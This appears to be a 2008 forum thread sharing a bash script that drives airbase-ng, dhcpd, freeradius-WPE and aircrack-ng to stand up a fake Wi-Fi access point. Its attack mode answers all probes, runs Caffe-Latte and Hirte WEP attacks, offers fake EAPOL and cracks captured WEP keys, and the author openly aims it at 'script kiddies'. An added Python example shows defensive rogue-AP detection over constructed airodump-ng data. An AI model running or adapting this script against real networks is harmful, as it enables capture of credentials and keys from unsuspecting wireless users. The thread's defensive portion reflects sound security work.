Timmo Posted December 4, 2008

Hi all. Before anybody criticizes, I'm not a big scripter and there are a lot of things I could have done with this to make it better, and this is prob very buggy, hence I'm uploading it here. OK, I have been playing around with airbase-ng lately (from aircrack-ng svn), also using dhcpd and freeradius, and I have started working on a script to make it easy to start the server for pwnage or just an access point. Here it is, have a look. Updated a little. Please comment.

```bash
#!/bin/bash
# Interactive wrapper around airbase-ng, dhcpd and freeradius.
# Each helper opens its own xterm; set debug=1 to keep those windows open
# (xterm -hold) so their output can be read after the process exits.
modprobe tun
DUMPPATH="capture/airbase"
debug=0
if [ "$debug" = "1" ]; then
    HOLD="-hold"
else
    HOLD=""
fi

# Stop anything left over from a previous run (uses killproc/daemon from the
# distribution's init-script function library).
function killdaemons {
    . /etc/rc.d/init.d/functions
    RETVAL=0
    echo -n "Shutting down dhcpd: "
    killproc dhcpd
    RETVAL=$?
    echo
    [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/dhcpd
    rm -f /var/state/dhcp/dhcpd.leases
    touch /var/state/dhcp/dhcpd.leases

    RETVAL=0
    echo -n "Shutting down radiusd: "
    killproc /usr/local/sbin/radiusd
    RETVAL=$?
    echo
    [ $RETVAL -eq 0 ]
    rm -f /usr/local/var/log/radius/radius.log
    touch /usr/local/var/log/radius/radius.log

    RETVAL=0
    echo -n "Shutting down airbase-ng: "
    killproc /usr/local/sbin/airbase-ng
    RETVAL=$?
    echo
    [ $RETVAL -eq 0 ]

    RETVAL=0
    echo -n "Shutting down xterm: "
    killproc /usr/bin/xterm
    RETVAL=$?
    echo
    [ $RETVAL -eq 0 ]
}

# Capture on the chosen channel with airodump-ng ($CHANNEL already holds "-c N ").
function captureairodump {
    xterm $HOLD -title "Capturing data on channel: $CHANNEL" -e /usr/local/sbin/airodump-ng -w $DUMPPATH $CHANNEL$CAPWIFI
}

function airbasefunc {
    xterm $HOLD -title "running airbase-ng" -e $command
}

# Bring up the at0 tap interface created by airbase-ng and serve DHCP on it.
function dhcpfunc {
    ifconfig at0 192.168.0.1 netmask 255.255.255.0
    echo -n "Starting dhcpd: "
    daemon /usr/sbin/dhcpd at0
    RETVAL=$?
    echo
    [ $RETVAL -eq 0 ] && touch /var/lock/subsys/dhcpd
    xterm $HOLD -title "tail DHCP leases" -e tail -f /var/state/dhcp/dhcpd.leases
}

function radiusdfunc {
    /usr/local/sbin/radiusd -i 192.168.0.1 -p 1812
    xterm $HOLD -title "tail radiusd log file" -e tail -f /usr/local/var/log/radius/radius.log &
    xterm $HOLD -title "tail radiusd other files" -e tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
}

function aircrackfunc {
    xterm $HOLD -title "cracking wep key" -e /usr/local/bin/aircrack-ng $DUMPPATH*.cap
}

# Adapter, BSSID, channel and ad-hoc mode. Every option is stored with its
# airbase-ng switch and a trailing space so they can be concatenated later.
function setbasicAP {
    echo "select adaptor"
    select INTERFACE in $INTERFACES; do break; done
    echo "Set BSSID. blank for adaptor address. example 00:01:02:03:44:55"
    read yz
    if [ "$yz" = "" ]; then
        BSSID=""
    else
        BSSID="-a $yz "
    fi
    echo "Set channel [1]"
    read yz
    if [ "$yz" = "" ]; then
        CHANNEL="-c 1 "
    else
        CHANNEL="-c $yz "
    fi
    echo "Ad-Hoc mode y/[n]"
    read yz
    if [ "$yz" = "y" ]; then
        ADHOC="-A "
        echo
    else
        ADHOC=""
    fi
}

# AP mode: a single ESSID, optionally restricted to listed client MACs.
function setESSID {
    echo "set essid to use for AP"
    read yz
    ESSID="--essid $yz "
    echo "allow specific clients? y/[n]"
    read yz
    if [ "$yz" = "y" ]; then
        echo "(f)ile or (s)pecified?"
        read yz
        if [ "$yz" = "f" ]; then
            echo "enter path to file"
            read xy
            MAC="--clients $xy "
        else
            echo "enter MAC address"
            read xy
            MAC="--client $xy "
        fi
    fi
}

# Attack mode: ESSID/MAC filtering and probe handling.
function setfilterhack {
    echo "filter ESSIDs and/or MACs. 0=skip [1=allow] 2=disallow"
    read yz
    case $yz in
        2 ) DISALLOW="-f disallow ";;
        0 ) SKIP="1";;
        * ) DISALLOW="";;
    esac
    if [ "$SKIP" = "1" ]; then
        DISALLOW=""
        MAC=""
        ESSID=""
    else
        echo "use MAC filtering? y/[n]"
        read yz
        if [ "$yz" = "y" ]; then
            echo "(f)ile or (s)pecified?"
            read yz
            if [ "$yz" = "f" ]; then
                echo "enter path to file"
                read xy
                MAC="--clients $xy "
            else
                echo "enter MAC address"
                read xy
                MAC="--client $xy "
            fi
        fi
        echo "use ESSID filtering? y/[n]"
        read yz
        if [ "$yz" = "y" ]; then
            echo "(f)ile or (s)pecified?"
            read yz
            if [ "$yz" = "f" ]; then
                echo "enter path to file"
                read xy
                ESSID="--essids $xy "
            else
                echo "enter ESSID"
                read xy
                ESSID="--essid $xy "
            fi
        fi
    fi
    echo "respond to all probes? y/[n] (works with the filtering)"
    read yz
    if [ "$yz" = "y" ]; then
        ALLPROBES="-P -C 120 "
    else
        ALLPROBES=""
    fi
}

function hideessid {
    echo "hide ESSID? y/[n]"
    read yz
    if [ "$yz" = "y" ]; then
        ESSIDHIDE="-X "
    else
        ESSIDHIDE=""
    fi
}

function disablebroadcast {
    echo "Disable responses to broadcast probes? y/[n]"
    read yz
    if [ "$yz" = "y" ]; then
        Broadcast="-y "
    else
        Broadcast=""
    fi
}

# Encryption flags advertised by the AP, optional WEP key, fake EAPOL and
# shared-key authentication settings.
function setencription {
    echo "set encryption"
    echo "use [0=None] 1=WEP 2=WPA1 3=WPA2 4=ALL"
    read yz
    WepKey=""
    case $yz in
        1 ) ENCRIPFLAG="-W 1 "
            echo
            echo "set wep key? [y]/n"
            read xy
            if [ "$xy" = "n" ]; then
                WepKey=""
                echo
            else
                echo "enter key"
                read xy
                WepKey="-w $xy "
                echo
            fi;;
        2 ) echo
            echo "set mode 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104"
            read xy
            ENCRIPFLAG="-z $xy ";;
        3 ) echo
            echo "set mode 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104"
            read xy
            ENCRIPFLAG="-Z $xy ";;
        4 ) ENCRIPFLAG="-0 "
            echo
            echo "set a wep key? [y]/n"
            read xy
            echo
            if [ "$xy" = "n" ]; then
                WepKey=""
            else
                echo "enter key"
                read xy
                WepKey="-w $xy "
            fi;;
        * ) ENCRIPFLAG="";;
    esac
    echo
    echo "fake EAPOL [0=Disable] 1=MD5 2=SHA1 3=auto"
    read yz
    case $yz in
        1 ) EAPOL="-V 1 " ;;
        2 ) EAPOL="-V 2 " ;;
        3 ) EAPOL="-V 3 " ;;
        * ) EAPOL="" ;;
    esac
    echo
    echo "force shared key authentication? y/[n]"
    read yz
    if [ "$yz" = "y" ]; then
        FORCESK="-s "
        echo "set key length. default 128"
        read xy
        if [ "$xy" = "" ]; then
            SKKEYLENGTH=""
        else
            SKKEYLENGTH="-S $xy "
        fi
    else
        FORCESK=""
        SKKEYLENGTH=""
    fi
}

function attack {
    echo "Select attack"
    echo "0) don't attack, AP mode only. default"
    echo "1) use Caffe-Latte attack"
    echo "2) use cfrag (Hirate) attack"
    read yz
    case $yz in
        1 ) ATTACK="-L "
            USEATTACK=1;;
        2 ) ATTACK="-N "
            USEATTACK=1;;
        * ) ATTACK=""
            USEATTACK=0;;
    esac
}

function debugging {
    echo "Print debugging info? [y]/n"
    read yz
    if [ "$yz" = "n" ]; then
        Verbose=""
    else
        Verbose="-v "
    fi
}

# ---- main ----
killdaemons
# List interface names from "ip link" (skipping lo); the user picks one in setbasicAP.
INTERFACES=`ip link | egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" | awk '{print $1}'`
setbasicAP
attack
if [ "$USEATTACK" = "0" ]; then
    setESSID
    hideessid
    disablebroadcast
    setencription
else
    setfilterhack
    hideessid
    disablebroadcast
    setencription
fi
debugging
SWITCHES="$BSSID$CHANNEL$ADHOC$ENCRIPFLAG$WepKey$EAPOL$DISALLOW$MAC$ESSID$ALLPROBES$ESSIDHIDE$Broadcast$FORCESK$SKKEYLENGTH$ATTACK$Verbose$INTERFACE"
command="/usr/local/sbin/airbase-ng $SWITCHES"
echo
echo $command
echo "run? [y]/n"
read yz
if [ "$yz" = n ]; then exit; fi
airbasefunc &
sleep 1
echo
if [ "$USEATTACK" = "1" ]; then
    echo "use airodump to capture replies? y/[n]"
    read captrue
    if [ "$captrue" = "y" ]; then
        echo "remove old dump files? y/[n]"
        read yz
        # Bug fix: the original tested $yx here, so the old dumps were never removed.
        if [ "$yz" = "y" ]; then rm -f $DUMPPATH*; fi
        echo "select interface (can use the same interface)"
        select CAPWIFI in $INTERFACES; do break; done
        captureairodump &
        sleep 1
    fi
fi
if [ "$captrue" = "y" ]; then
    echo "run aircrack on captured packets? WEP only. y/[n]"
    read yz
    if [ "$yz" = "y" ]; then
        aircrackfunc &
        sleep 1
    fi
fi
echo
echo "use dhcp server? y/[n]"
read yz
if [ "$yz" = "y" ]; then
    dhcpfunc &
    sleep 1
fi
echo
echo "use radiusd? y/[n]"
read yz
if [ "$yz" = "y" ]; then
    radiusdfunc &
    sleep 1
fi
echo
echo "press enter to kill all"
read asdf
killdaemons
```
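On the monitoring side, the same aircrack-ng suite gives you the data to spot an AP like the one this script brings up: airodump-ng writes the access points it sees to a CSV, and a rogue AP advertising one of your ESSIDs from an unknown BSSID, or without the encryption your network uses, stands out against an inventory. This Python check is an added example, not code from Timmo's script or from aircrack-ng; the CSV rows and the KNOWN_APS inventory are constructed for it.

```python
import csv

# Constructed airodump-ng style CSV (AP section only), not a real capture.
# The third row beacons the office ESSID with no encryption from a BSSID that
# is not in our inventory, which is how a cloned AP shows up in airodump-ng.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2008-12-04 09:00:01, 2008-12-04 09:05:10,  6,  54, WPA2, CCMP, PSK, -45,  300,  0, 0. 0. 0. 0,  9, corp-wifi, 
00:11:22:33:44:66, 2008-12-04 09:00:01, 2008-12-04 09:05:10, 11,  54, WPA2, CCMP, PSK, -60,  280,  0, 0. 0. 0. 0,  9, corp-wifi, 
AA:BB:CC:DD:EE:FF, 2008-12-04 09:03:20, 2008-12-04 09:05:10,  1,  54, OPN,  ,  , -30,  120,  0, 0. 0. 0. 0,  9, corp-wifi, 
DE:AD:BE:EF:00:01, 2008-12-04 09:04:00, 2008-12-04 09:05:10,  1,  54, WPA2, CCMP, PSK, -70,   40,  0, 0. 0. 0. 0,  6, guest1, 
"""

# Inventory of the APs we operate (constructed for the example): ESSID ->
# expected privacy setting and the BSSIDs allowed to advertise it.
KNOWN_APS = {
    "corp-wifi": {"privacy": "WPA2",
                  "bssids": {"00:11:22:33:44:55", "00:11:22:33:44:66"}},
}


def parse_ap_rows(text):
    """Return the AP rows of an airodump-ng CSV as dicts keyed by column name.

    The file has two sections separated by a blank line (APs, then stations);
    only the first is read. Columns are padded with spaces, so they are stripped.
    """
    lines = []
    for line in text.strip().splitlines():
        if not line.strip():
            break                      # blank line: start of the station section
        lines.append(line)
    reader = csv.DictReader(lines, skipinitialspace=True)
    rows = []
    for row in reader:
        # A row with extra fields gets a None key from DictReader; drop it.
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k})
    return rows


def find_rogue_aps(text, known=KNOWN_APS):
    """Flag APs that beacon one of our ESSIDs from a BSSID not in the
    inventory, or with a privacy setting different from our deployment."""
    findings = []
    for row in parse_ap_rows(text):
        essid = row["ESSID"]
        if essid not in known:
            continue                   # not one of our networks; out of scope here
        reasons = []
        if row["BSSID"] not in known[essid]["bssids"]:
            reasons.append("unknown BSSID")
        if row["Privacy"] != known[essid]["privacy"]:
            reasons.append(f"privacy {row['Privacy']} != {known[essid]['privacy']}")
        if reasons:
            findings.append((row["BSSID"], essid, row["channel"], ", ".join(reasons)))
    return findings
```

Run against the sample, `find_rogue_aps(SAMPLE_CSV)` reports only AA:BB:CC:DD:EE:FF on channel 1, for both an unknown BSSID and an OPN network where WPA2 is expected.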
blackriver Posted December 4, 2008

Thanks for posting, looks good. I'll try this out on my way home.
loftrat Posted December 4, 2008

Anything we can do about that nasty wide code box?
Timmo (Author) Posted December 4, 2008

Updated the script. It now has different options for AP mode or attack mode (makes it a little easier to set up for a script kiddy, hehe). Oh, and I tried to fix the long code box but couldn't find it in the short amount of time I have doing nothing at work :)
Timmo (Author) Posted December 15, 2008

*bump* Has anyone tested this yet? It seems to work on my BackTrack system, but people might want to try others. I haven't been able to get the radius part to work. I've been testing many situations; shared key doesn't seem to want to work either (might have been a little impatient doing this test though). What are other people's tests like? I can't get anything to work with WPA1 or WPA2, but I haven't had the chance to do a lot of testing here.
DingleBerries Posted December 17, 2008

Just looking over the code, it seems that ath0 is the hard-coded network adapter, please correct me if wrong. Maybe add an option to input your NIC, eth1 in my case. I can edit it myself, but for the skiddish it may be a bit more difficult. Can't test it on this lappy, but I will as soon as I get a chance.
Timmo (Author) Posted December 17, 2008

After the functions have been declared it kills the processes required (had issues with airbase-ng continuing to run after I closed out), then it comes up with a prompt asking you to select your adapter. This was pulled out of the airoscript script that's on BackTrack. (Will be noting this in the code later when I finish it completely.)
DingleBerries Posted December 17, 2008

> After the functions have been declared it kills the processes required (had issues with airbase-ng continuing to run after I closed out), then it comes up with a prompt asking you to select your adapter. This was pulled out of the airoscript script that's on BackTrack. (Will be noting this in the code later when I finish it completely.)

Awesome. I use Mint as my main distro; I do a lot of pentesting legally, so BackTrack is really just a fun toy for me. So will it work across multiple distros (not just Slax)? I am going to the local shop today to find an Atheros card (some other fun things I want to try need this) and I will test it out then... broadcom + ndiswrapper = shit. I've copied the py and will look over it in a few, but it seems you have the hard part out of the way. Are you going to make a GUI for this as well? Asked because I saw a py/GUI thread.
Timmo (Author) Posted December 18, 2008

That's the idea: creating a GUI for this and opening up my skills to add more into the script kiddy community. (No good at actual programming, but scripting I seem to get a grasp on.) I did have a bit of a look at FreeBASIC as I have done work in CBM BASIC and VB, but compiling issues on BackTrack prevented me from using this. And the only reason I use BackTrack is because I was building a really good pen test box using Ubuntu 8 as the base, but once the kernel was updated I thought I had issues with the patched drivers I was using, but it turns out all drivers and chipsets except the Intel one showed 0 power in airodump-ng. No good. Tried Linux Mint and openSUSE, all with the same error, then tried Fedora: compile issues, so I didn't even bother. The best bet atm is to stick with BT even though I dislike the KDE desktop so much. I will start looking at GUI creation over the next few weeks and hopefully put this into a GUI during my time off work.